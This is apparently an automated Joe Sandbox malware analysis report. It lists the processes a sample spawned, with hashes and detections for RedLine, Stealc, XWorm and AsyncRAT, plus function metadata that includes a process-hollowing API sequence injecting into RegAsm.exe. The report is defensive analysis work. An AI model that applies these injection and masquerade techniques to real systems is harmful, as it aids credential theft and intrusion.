Imagebase:	0x2e0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:21:26
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x3c0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:21:26
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x500000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.3088502787.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:21:26
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Imagebase:	0x400000
File size:	2'990'472 bytes
MD5 hash:	B826DD92D78EA2526E465A34324EBEEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000002.3006538986.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000020.00000000.2916373422.0000000000401000.00000020.00000001.01000000.0000001E.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:21:27
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"
Imagebase:	0x6b0000
File size:	360'448 bytes
MD5 hash:	2F1D09F64218FFFE7243A8B44345B27E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	22:21:30
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe"
Imagebase:	0xc20000
File size:	311'296 bytes
MD5 hash:	58E8B2EB19704C5A59350D4FF92E5AB6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000023.00000000.2951592112.0000000000C41000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000002.3153539765.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:21:32
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
Imagebase:	0xca0000
File size:	986'112 bytes
MD5 hash:	1EF39C8BC5799AA381FE093A1F2D532A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.3164599118.0000000006610000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.3009810672.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	22:21:34
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x410000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	22:21:35
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe"
Imagebase:	0x510000
File size:	367'616 bytes
MD5 hash:	6B470F7251AA9C14D7DAEA8F6446E217
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	22:21:35
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	22:21:38
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	22:21:38
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024
Imagebase:	0xde0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	22:21:38
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x360000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	22:21:38
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x580000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	22:21:38
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 904
Imagebase:	0xde0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 05400E16 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cddf2fe302a7f87153dbc4e721eb1e7637394385d899595b727d288b1a07b9ab
Instruction ID: fdf796608640a0535e0272641fe57640be4769bc1f3f528a52536da93318024a
Opcode Fuzzy Hash: cddf2fe302a7f87153dbc4e721eb1e7637394385d899595b727d288b1a07b9ab
Instruction Fuzzy Hash: E0018BB710C210BD7151C2122B1CBFB2B2AE2D23713B0993BF40BE84C6C2B50B5BA132

Function 05400E29 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b1fb4450f88549d8cef7a10070bad2c9f34e47bea66df54b728deafbbc2bf5
Instruction ID: 8429ed7cda6e83683b3432f6771a6cbaac3409cdb1531f5e76b76aa3e3f80ce3
Opcode Fuzzy Hash: 77b1fb4450f88549d8cef7a10070bad2c9f34e47bea66df54b728deafbbc2bf5
Instruction Fuzzy Hash: C51159EB11C124BE7052D1522B18BFB6A2EE1E27303B09537F85BE5586D2F80F5B6172

Function 05400E33 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84a0df47d66b6bcb40d3ffa939d26b1b4abff63faa49666b3f73b1280795fdc9
Instruction ID: f5ad649888c97b53c60a1a81e3bfbc81fa1b4705fdd687b114387df888bfa929
Opcode Fuzzy Hash: 84a0df47d66b6bcb40d3ffa939d26b1b4abff63faa49666b3f73b1280795fdc9
Instruction Fuzzy Hash: CA118CEB11C124BD6052D1522B18AFB6A2EE1D27303719537F84BE6586D2F80F5B2172

Function 05400EBC Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb8ec3bbe79fad78c7486b50d100579387bfcb7ac9052ba2cbb62379c71ae4de
Instruction ID: 8bf4ee8b75c74be93ed5836f9b4e804dc5376cc1ff0ccca239f148b18356c47d
Opcode Fuzzy Hash: cb8ec3bbe79fad78c7486b50d100579387bfcb7ac9052ba2cbb62379c71ae4de
Instruction Fuzzy Hash: 65116AAB11C110AD6052D1512B2CBFB6B2EE1D6B313B0A937F40FE45C692F80B5B2071

Function 05400E69 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0b09e0670e9c37de434605b52ac8e600a74a341d7ed05b09e09bd1da42c264
Instruction ID: dfaf8aa15669f679045acb34fcd964f0e5fe86f38a8269d9e4af73335018d2a6
Opcode Fuzzy Hash: cf0b09e0670e9c37de434605b52ac8e600a74a341d7ed05b09e09bd1da42c264
Instruction Fuzzy Hash: 161191A711C110BE6141C1516A5CBFB6B2AE2D6730370953BF44BD54C6D2F80B5B6172

Function 05400E92 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bf176a28f1daa478207c9320d229f22eeb49514949abca7acbb9f8080b0c9f5
Instruction ID: 5a1fb6736dc55909aa27366b15956e57db85ad046c118a0e3c7b13c5ff8a9666
Opcode Fuzzy Hash: 3bf176a28f1daa478207c9320d229f22eeb49514949abca7acbb9f8080b0c9f5
Instruction Fuzzy Hash: AD01ADE710C110AD6151D1612A1CBFB672FE1D27703B09A37F05BD85C6D2B50B5B6172

Function 05400EEC Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd22223d4a69cfec29c8690cdfe5f51c259f76488155e60542f65a9570502f5
Instruction ID: b77a56d8e30f506a3ecfc72aa93e603c06239eb91151ed02df81015d7ed6d0a0
Opcode Fuzzy Hash: 7bd22223d4a69cfec29c8690cdfe5f51c259f76488155e60542f65a9570502f5
Instruction Fuzzy Hash: 2F01FEB710D1606EB14281612E58FFA6B2DD4C36713754577F40AC6487C2980B5FA272

Function 05400EA9 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e182e94acf249c2af84607ff68ceea9980041613732fc52a5ae35a181ec9fe9e
Instruction ID: 7f56c0950c2e9f71f56a1a0f44e88d3685d2316142ad7dd5b0201cee7afa3b44
Opcode Fuzzy Hash: e182e94acf249c2af84607ff68ceea9980041613732fc52a5ae35a181ec9fe9e
Instruction Fuzzy Hash: 29015AEB10D110BD7041D1622B1CBFB6A2EE1D26713B19A37F44BD44C992A90B9B6072

Function 05400ED2 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d293786c63ce3835b6ec0b772c6b32a01399ced6f055fa711af8e7dedeac3113
Instruction ID: 38fd73c5909d7a7c31c6a88514bf4424ef63a9736a06a6a1e926356c55c81c99
Opcode Fuzzy Hash: d293786c63ce3835b6ec0b772c6b32a01399ced6f055fa711af8e7dedeac3113
Instruction Fuzzy Hash: 12018FEB10C110AD7051D1622B58BF75B6EE1E67313B0A537F00BC95CA92E80B8B7031

Non-executed Functions

Function 05400879 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a92b105f41d8c7210130c572fd22e2ca1cb6bf8b43f7f28d8728271835c2523
Instruction ID: 46cdc9c8c0acffaad72198618e829a68293b12d6bb99d24e956c1c5d67ac63b0
Opcode Fuzzy Hash: 9a92b105f41d8c7210130c572fd22e2ca1cb6bf8b43f7f28d8728271835c2523
Instruction Fuzzy Hash: 250126EB08C600EDA641C55A524D7F53F6FF6972313F0613BE40F48983A6F5460B81D1

Function 054008CF Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102263976.0000000005400000.00000040.00001000.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 207455103174a51af7699c686d0aa7740992e23c6db5043b0abf060290773d33
Instruction ID: 99b588673db8bef624d87d9ae847d1637d25ee3146cee0b7ef4dff6e21bc3cf4
Opcode Fuzzy Hash: 207455103174a51af7699c686d0aa7740992e23c6db5043b0abf060290773d33
Instruction Fuzzy Hash: ED0147DB0CC354EDA603D661424C7F23F6BB6132303B07037E08F99A83A2F80A4B9591

Analysis Process: gold.exePID: 2972, Parent PID: 5632COMMON

Execution Graph

Execution Coverage:	39.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.2%
Total number of Nodes:	37
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 027A24D9 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 027A2648
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027A265B
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 027A2679
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027A269D
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 027A26C8
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 027A2720
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 027A276B
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027A27A9
Wow64SetThreadContext.KERNEL32(?,?), ref: 027A27E5
ResumeThread.KERNELBASE(?), ref: 027A27F4

Strings

Load, xrefs: 027A2517
GetP, xrefs: 027A255B
ress, xrefs: 027A2563
aryA, xrefs: 027A251F

Memory Dump Source

Source File: 00000007.00000002.2695465041.00000000027A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a2000_gold.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 0a33184ce9a69c7304ed0e6c67e1367e79225172ff16a292b763199553c92e62
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 22B1E57660024AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB342D774FA41CB94

Function 009C0B2A Relevance: 1.8, APIs: 1, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,037A3594,00000040,?,?), ref: 009C0EC4

Memory Dump Source

Source File: 00000007.00000002.2694925230.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9c0000_gold.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: dfeaf37207134063476265e6c906356371d83a08dd8e07a14cb23918e0afd2c2
Instruction ID: 3eb68464de617a580772702702e8ebd9e149f2b14b79bd27542dc86b87be3883
Opcode Fuzzy Hash: dfeaf37207134063476265e6c906356371d83a08dd8e07a14cb23918e0afd2c2
Instruction Fuzzy Hash: F4C17F70E4426ADFCB01CFA9C480AADFBF1BF89314F548999D858E7256C374A941CB91

Function 009C0EFA Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,?), ref: 009C0F99

Memory Dump Source

Source File: 00000007.00000002.2694925230.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9c0000_gold.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 89dc549e5e520ab11ae4b6e855496425fd00a3cf8c1cd39a9b8b1b9151daa5b8
Instruction ID: 31c2c5b6021a14c1172f00fb8d9766fa98a2da48017b1203009d2f1688205831
Opcode Fuzzy Hash: 89dc549e5e520ab11ae4b6e855496425fd00a3cf8c1cd39a9b8b1b9151daa5b8
Instruction Fuzzy Hash: F22102B59002499FCB10CF9AD984ADEBBF4FF48310F20842EE859A7350D374AA44CFA1

Function 009C04F0 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,?), ref: 009C0F99

Memory Dump Source

Source File: 00000007.00000002.2694925230.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9c0000_gold.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: f4782b8d2c1a5017cfdc0506346e129da99aa3b03dfa55aeb88bac6c2469e37c
Instruction ID: 4be121391abeb624e127d4dc0a21cf59381ad5f440f0a8980ce6a7c66be1287d
Opcode Fuzzy Hash: f4782b8d2c1a5017cfdc0506346e129da99aa3b03dfa55aeb88bac6c2469e37c
Instruction Fuzzy Hash: 3E21D0B5900249DFCB10CF9AD984ADEBBF4FB48310F20842EE919A7250D374AA54CBA5

Function 009C04D0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,037A3594,00000040,?,?), ref: 009C0EC4

Memory Dump Source

Source File: 00000007.00000002.2694925230.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9c0000_gold.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f384d661bbdf53e7ce819816c9aabc9ecb8fd09f5a1e95166467bdfdda676a4c
Instruction ID: e1cfe962bcb264807077f544b70d4aef1d5781900de6cdbbd6267a52ce90fbed
Opcode Fuzzy Hash: f384d661bbdf53e7ce819816c9aabc9ecb8fd09f5a1e95166467bdfdda676a4c
Instruction Fuzzy Hash: 5C2123B1C05298EFCB00DFAAC884ADEFFB4FF49310F10815AE518A7210C378A514CBA5

Function 009C04E4 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,037A3594,00000040,?,?), ref: 009C0EC4

Memory Dump Source

Source File: 00000007.00000002.2694925230.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9c0000_gold.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3d030dc2b570212d028075f8fa8bf1a7a7626625a41c39fb4c8e0015d54a5f83
Instruction ID: 612333f1d2496388d878029b90014d4bdb14ca833058818fb8b2a057a4acbd32
Opcode Fuzzy Hash: 3d030dc2b570212d028075f8fa8bf1a7a7626625a41c39fb4c8e0015d54a5f83
Instruction Fuzzy Hash: 4521E0B5D01259EFCB10DF9AC984ADEFBB4FB48310F10852AE918A7210C375A950CFA1

Analysis Process: RegAsm.exePID: 5580, Parent PID: 2972COMMON

Execution Graph

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.5%
Total number of Nodes:	159
Total number of Limit Nodes:	9

Executed Functions

Function 06E4F2D8 Relevance: 5.5, Strings: 4, Instructions: 508
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06E4F6D1
$]q, xrefs: 06E4F60D
$]q, xrefs: 06E4FB4E
$]q, xrefs: 06E4FA81

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 2ad3237f6277dc737cf5b01827a191ce341169efe9c32a7c0ebdb7cc71dc9909
Instruction ID: 646d02dd66a3d6c77e4be7d9be1e4116b79dc547e37c82c2a08bac08665ff583
Opcode Fuzzy Hash: 2ad3237f6277dc737cf5b01827a191ce341169efe9c32a7c0ebdb7cc71dc9909
Instruction Fuzzy Hash: 2632C270E01229CFDB64DF65C890BDEB7B2BB89300F5095E9C40AAB250DB349E81CF91

Function 06E4E7B8 Relevance: 5.3, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06E4E963
$]q, xrefs: 06E4EA29
$]q, xrefs: 06E4E979
$]q, xrefs: 06E4EA13

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 2aa98f834fcddab2b090b8b9e2870ee0b7cb26f656369d44a1f7450da60ffcc6
Instruction ID: b3d1110d1cc75a3c68ee5134bd42938e7ab4ab6fd1e08aef54f9c03cbf71f1fc
Opcode Fuzzy Hash: 2aa98f834fcddab2b090b8b9e2870ee0b7cb26f656369d44a1f7450da60ffcc6
Instruction Fuzzy Hash: 3DC1E870E01219CFDB68DFA5D9907AEBBB2FF89300F5091A9C40AAB254DB345D86CF51

Function 06E4DE60 Relevance: 2.7, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR]q, xrefs: 06E4DF1A
PH]q, xrefs: 06E4E152

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID: LR]q$PH]q
API String ID: 0-3791814328
Opcode ID: 0dec0872c3e7ed8030099ae99e7cc61326684582e0580c50a11ee4eeea0b0185
Instruction ID: 66ffad5eb9395fcd557018393efad11c3322741e0f548b38fa9ddf13c53c3f05
Opcode Fuzzy Hash: 0dec0872c3e7ed8030099ae99e7cc61326684582e0580c50a11ee4eeea0b0185
Instruction Fuzzy Hash: 6DA1E274E00319CFDB64DFA5D854BAEBBB2BF89304F1094A9D409AB364DB305985CF51

Function 06E4BA05 Relevance: 2.7, Strings: 2, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06E4BB5A
$]q, xrefs: 06E4BB6A

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 2c831e5fffd277e07ffec15d06d23d1f052b0fac6f3af1a6177c1d450d12bf15
